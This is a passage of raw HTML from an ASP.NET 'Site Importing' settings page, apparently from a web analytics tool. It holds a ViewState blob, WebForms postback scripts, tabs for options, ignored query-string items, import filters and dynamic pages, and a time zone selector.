FTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAEEBJbXBvcnRGaWx0ZXJpbmcB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAABJJbXBvcnRGaWx0ZXJpbmdUYWILZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTIPMt4LAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAxASWdub3JlSXRlbXMB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAA5JZ25vcmVJdGVtc1RhYgtkBRljdGwwMCRNUEgkZ3JkRHluYW1pY1BhZ2VzDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZAUaY3RsMDAkTVBIJGdyZEltcG9ydEZpbHRlcnMPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMQ8y1gsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtNA8y4AsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAADUBEeW5hbWljUGFnZXMB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAA9EeW5hbWljUGFnZXNUYWILZAUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFImN0bDAwJE1QSCRjaGtTdHJpcFVSTF9TZXR0aW5nQ2hlY2tUiQz6CSndQahG8oOmCFgtj3L26wUhVeXrF8CicWwtZg==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=pVn15ziXvQY5aBffxiDTK6PUkVd1wbLwZ8qHXgDTDQU-gDmeOQZCbCnf3LN8cb6wKZJNHgRyjasDbTS9TuTZ7GXz6UL6zabFuTHuGM9izuBi-gzcVhEZX9Fg6cQx4oJc6iXtzA8ahWISPmTnWBlMNk0W7V9Kl_5HxQNbPSm8qmJcO3ou2wT9aun3Nb592DHA0&amp;t=26c081" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$TPH$UpdatePanel3','','tctl00$MPH$UpdatePanel5',''], ['ctl00$BPH$btnSave','','ctl00$BPH$btnEditImportFilters','','ctl00$BPH$btnDeleteImportFilters','','ctl00$BPH$btnEditDynamicPages','','ctl00$BPH$btnDeleteDynamicPages','','ctl00$MPH$lnkRefresh','','ctl00$MPH$lnkRefreshAfterReprocessing',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Site Importing
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_BPH_mnuAdd' name='ctl00$BPH$mnuAdd' style='z-index:800'>
   <li class='hmItem hmFirst hmLast' id='ctl00_BPH_mnuAdd_btnAdd' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_BPH_mnuAdd_btnAdd_btnExclusion' style='z-index: 800'><a class='hmA' href='#'>Import Filter</a></li>
       <li class='hmItem hmLast' id='ctl00_BPH_mnuAdd_btnAdd_btnDynamicPage' style='z-index: 800'><a class='hmA' href='#'>Dynamic Page</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>

   <div id="divImportFilterButtons" style="display: none;" class="TogglableButtons">
       
       <div id="ctl00_BPH_btnEditImportFilters" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditImportFilters(); return false;"><span class="BBInner">Edit</span></a></div>
       <div id="ctl00_BPH_btnDeleteImportFilters" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteImportFilters(); return false;"><span class="BBInner">Delete</span></a></div>
   </div>
   <div id="divDynamicPagesButtons" style="display: none;" class="TogglableButtons">
       
       <div id="ctl00_BPH_btnEditDynamicPages" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditDynamicPages(); return false;"><span class="BBInner">Edit</span></a></div>
       <div id="ctl00_BPH_btnDeleteDynamicPages" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteDynamicPages(); return false;"><span class="BBInner">Delete</span></a></div>
   </div>
   <div id="ctl00_BPH_btnReprocess" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ShowReprocessPopup();; return false;"><span class="BBInner">Reprocess</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   <div id="ctl00_TPH_UpdatePanel3">
   
           
           
<!-- HyperTabStrip -->
   <div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
       <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Ignore Items</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Import Filtering</span></span></a></li>
       <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem4'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Dynamic Pages</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   
       
</div>

       </div>
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel5">
   
           <a id="ctl00_MPH_lnkRefresh" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkRefresh&#39;,&#39;&#39;)" style="display: none"></a>
           <a id="ctl00_MPH_lnkRefreshAfterReprocessing" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkRefreshAfterReprocessing&#39;,&#39;&#39;)" style="display: none"></a>
           
<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
           <span id="ctl00_MPH_OptionsTab">
                   <table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtDomainUrl">
                   <td id="ctl00_MPH_txtDomainUrl_Label" class="Indent Fixed">Site Url</td><td id="ctl00_MPH_txtDomainUrl_Setting" class="Setting"><input name="ctl00$MPH$txtDomainUrl_SettingText" type="text" value="555-555-0199@example.com" size="50" id="ctl00_MPH_txtDomainUrl_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_lstTimeZone">
                   <td id="ctl00_MPH_lstTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_lstTimeZone_Setting" class="Setting"><select name="ctl00$MPH$lstTimeZone_SettingDropDown" id="ctl00_MPH_lstTimeZone_SettingDropDown">
                       <option value="0">(GMT-12:00) International Date Line West</option>
                       <option selected="selected" value="1">(GMT-11:00) Midway Island, Samoa</option>
                       <option value="2">(GMT-10:00) Hawaii</option>
                       <option value="3">(GMT-09:00) Alaska</option>
                       <option value="-2147483579">(GMT-08:00) Tijuana, Baja California</option>
                       <option value="4">(GMT-08:00) Pacific Time (US &amp; Canada)</option>
                       <option value="-2147483580">(GMT-07:00) Chihuahua, La Paz, Mazatlan - New</option>
                       <option value="10">(GMT-07:00) Mountain Time (US &amp; Canada)</option>
                       <option value="15">(GMT-07:00) Arizona</option>
                       <option value="13">(GMT-07:00) Chihuahua, La Paz, Mazatlan - Old</option>
                       <option value="25">(GMT-06:00) Saskatchewan</option>
                       <option value="30">(GMT-06:00) Guadalajara, Mexico City, Monterrey - Old</option>
                       <option value="20">(GMT-06:00) Central Time (US &amp; Canada)</option>
                       <option value="-2147483581">(GMT-06:00) Guadalajara, Mexico City, Monterrey - New</option>
                       <option value="33">(GMT-06:00) Central America</option>
                       <option value="35">(GMT-05:00) Eastern Time (US &amp; Canada)</option>
                       <option value="40">(GMT-05:00) Indiana (East)</option>
                       <option value="45">(GMT-05:00) Bogota, Lima, Quito, Rio Branco</option>
                       <option value="-2147483573">(GMT-04:30) Caracas</option>
                       <option value="-2147483576">(GMT-04:00) Manaus</option>
                       <option value="50">(GMT-04:00) Atlantic Time (Canada)</option>
                       <option value="55">(GMT-04:00) La Paz</option>
                       <option value="56">(GMT-04:00) Santiago</option>
                       <option value="60">(GMT-03:30) Newfoundland</option>
                       <option value="70">(GMT-03:00) Buenos Aires, Georgetown</option>
                       <option value="73">(GMT-03:00) Greenland</option>
                       <option value="65">(GMT-03:00) Brasilia</option>
                       <option value="-2147483575">(GMT-03:00) Montevideo</option>
                       <option value="75">(GMT-02:00) Mid-Atlantic</option>
                       <option value="80">(GMT-01:00) Azores</option>
                       <option value="83">(GMT-01:00) Cape Verde Is.</option>
                       <option value="90">(GMT) Casablanca, Monrovia, Reykjavik</option>
                       <option value="85">(GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London</option>
                       <option value="95">(GMT+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague</option>
                       <option value="100">(GMT+01:00) Sarajevo, Skopje, Warsaw, Zagreb</option>
                       <option value="105">(GMT+01:00) Brussels, Copenhagen, Madrid, Paris</option>
                       <option value="110">(GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna</option>
                       <option value="113">(GMT+01:00) West Central Africa</option>
                       <option value="130">(GMT+02:00) Athens, Bucharest, Istanbul</option>
                       <option value="-2147483583">(GMT+02:00) Beirut</option>
                       <option value="-2147483582">(GMT+02:00) Amman</option>
                       <option value="135">(GMT+02:00) Jerusalem</option>
                       <option value="-2147483578">(GMT+02:00) Windhoek</option>
                       <option value="125">(GMT+02:00) Helsinki, Kyiv, Riga, Sofia, Tallinn, Vilnius</option>
                       <option value="140">(GMT+02:00) Harare, Pretoria</option>
                       <option value="115">(GMT+02:00) Minsk</option>
                       <option value="120">(GMT+02:00) Cairo</option>
                       <option value="155">(GMT+03:00) Nairobi</option>
                       <option value="145">(GMT+03:00) Moscow, St. Petersburg, Volgograd</option>
                       <option value="150">(GMT+03:00) Kuwait, Riyadh</option>
                       <option value="158">(GMT+03:00) Baghdad</option>
                       <option value="-2147483577">(GMT+03:00) Tbilisi</option>
                       <option value="160">(GMT+03:30) Tehran</option>
                       <option value="165">(GMT+04:00) Abu Dhabi, Muscat</option>
                       <option value="170">(GMT+04:00) Caucasus Standard Time</option>
                       <option value="-2147483584">(GMT+04:00) Baku</option>
                       <option value="-2147483574">(GMT+04:00) Yerevan</option>
                       <option value="175">(GMT+04:30) Kabul</option>
                       <option value="180">(GMT+05:00) Ekaterinburg</option>
                       <option value="185">(GMT+05:00) Islamabad, Karachi, Tashkent</option>
                       <option value="200">(GMT+05:30) Sri Jayawardenepura</option>
                       <option value="190">(GMT+05:30) Chennai, Kolkata, Mumbai, New Delhi</option>
                       <option value="193">(GMT+05:45) Kathmandu</option>
                       <option value="201">(GMT+06:00) Almaty, Novosibirsk</option>
                       <option value="195">(GMT+06:00) Astana, Dhaka</option>
                       <option value="203">(GMT+06:30) Yangon (Rangoon)</option>
                       <option value="207">(GMT+07:00) Krasnoyarsk</option>
                       <option value="205">(GMT+07:00) Bangkok, Hanoi, Jakarta</option>
                       <option value="225">(GMT+08:00) Perth</option>
                       <option value="210">(GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi</option>
                       <option value="227">(GMT+08:00) Irkutsk, Ulaan Bataar</option>
                       <option value="220">(GMT+08:00) Taipei</option>
                       <option value="215">(GMT+08:00) Kuala Lumpur, Singapore</option>
                       <option value="240">(GMT+09:00) Yakutsk</option>
                       <option value="230">(GMT+09:00) Seoul</option>
                       <option value="235">(GMT+09:00) Osaka, Sapporo, Tokyo</option>
                       <option value="250">(GMT+09:30) Adelaide</option>
                       <option value="245">(GMT+09:30) Darwin</option>
                       <option value="275">(GMT+10:00) Guam, Port Moresby</option>
                       <option value="255">(GMT+10:00) Canberra, Melbourne, Sydney</option>
                       <option value="270">(GMT+10:00) Vladivostok</option>
                       <option value="260">(GMT+10:00) Brisbane</option>
                       <option value="265">(GMT+10:00) Hobart</option>
                       <option value="280">(GMT+11:00) Magadan, Solomon Is., New Caledonia</option>
                       <option value="285">(GMT+12:00) Fiji, Kamchatka, Marshall Is.</option>
                       <option value="290">(GMT+12:00) Auckland, Wellington</option>
                       <option value="300">(GMT+13:00) Nuku&#39;alofa</option>

                   </select></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_IgnoreItemsTab' class='' style='display:none'>
           <span id="ctl00_MPH_IgnoreItemsTab">
                   <table class="WarningMessage"
           <tr><td class="WarningMessage">
           <div class="WarningMessage">
           These settings will permanently affect imported data. It is recommended that you retain the original site logs.</div></td></tr></table>
           
                   <table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtQueryStringItemsToIgnore">
                   <td id="ctl00_MPH_txtQueryStringItemsToIgnore_Setting" class="Indent Setting" colspan="2"><span class='Label'>Query String Items to Ignore<br /></span><textarea name="ctl00$MPH$txtQueryStringItemsToIgnore_SettingText" rows="12" cols="50" id="ctl00_MPH_txtQueryStringItemsToIgnore_SettingText" class="text">

</textarea></td>
               </tr>
           </table>
                   <table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_chkStripURL">
                   <td id="ctl00_MPH_chkStripURL_Setting" class="Indent Setting"><input id="ctl00_MPH_chkStripURL_SettingCheck" type="checkbox" name="ctl00$MPH$chkStripURL_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkStripURL_SettingCheck">Enable removal of URL items after semicolon (used for jsessionid)</label></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_ImportFilteringTab' class='' style='display:none'>
           <span id="ctl00_MPH_ImportFilteringTab">
                   <span id="ctl00_MPH_ctxImportFilters">
<!-- HyperMenu -->
           <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl04' name='ctl00$MPH$ctl04' style='z-index:800'>
               <li class='hmItem hmFirst' id='ctl00_MPH_ctl04_hm0' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
               <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
                   <li class='hmItem hmFirst' id='ctl00_MPH_ctl04_hm0_hm0' style='z-index: 800'><a class='hmA' href='#'>Import Filter</a></li>
                   <li class='hmItem hmLast' id='ctl00_MPH_ctl04_hm0_hm1' style='z-index: 800'><a class='hmA' href='#'>Dynamic Page</a></li>
               </ul><div class='hmScrollDown'></div></div>
               </li>
               <li class='hmItem' id='ctl00_MPH_ctl04_hm1' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
